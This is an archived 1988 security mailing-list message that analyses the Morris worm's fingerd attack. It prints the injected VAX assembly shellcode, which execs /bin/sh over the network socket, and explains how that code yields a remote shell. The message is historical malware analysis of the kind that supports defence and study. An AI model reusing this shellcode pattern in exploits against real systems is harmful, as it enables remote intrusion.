|
|
ARCHIVE: 'Phage List' - Archives (1988 - 1989)
DOCUMENT: phage #022 [virus guts.] (1 message, 602 bytes)
SOURCE: http://securitydigest.org/exec/display?f=phage/archive/022.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.
START OF DOCUMENT
From: Bill Sommerfeld <wesommer@ATHENA.MIT.EDU>
To: phage
Date: Fri 00:50:23 04/11/1988 EST
Subject: virus guts.
References:
[Thread Prev: 021]
[Thread Next: 024]
[Message Prev: 021]
[Message Next: 387]
The code which is inserted into finger is rather simple: mcount+70: pushl $68732f '/sh' mcount+76: pushl $6e69622f '/bin' mcount+7c: movl sp,r10 mcount+7f: pushl $0 mcount+81: pushl $0 mcount+83: pushl r10 mcount+85: pushl $3 mcount+87: movl sp,ap mcount+8a: chmk $3b (execve) For those of you who can't read vax assembler, this does up an "execve", with no arguments, of /bin/sh; since this is run in the context of the finger daemon, stdin and stdout are connected to the network socket... From disassembling the code, it looks like the programmer is really anally retentive about checking return codes, and, in addition, prefers to use array indexing instead of pointers to walk through arrays. - Bill
END OF DOCUMENT
| ISSN 1742-948X 01 (Online) | 2005/03/01 | Copyright 2002-2008 securitydigest.org. All rights reserved. |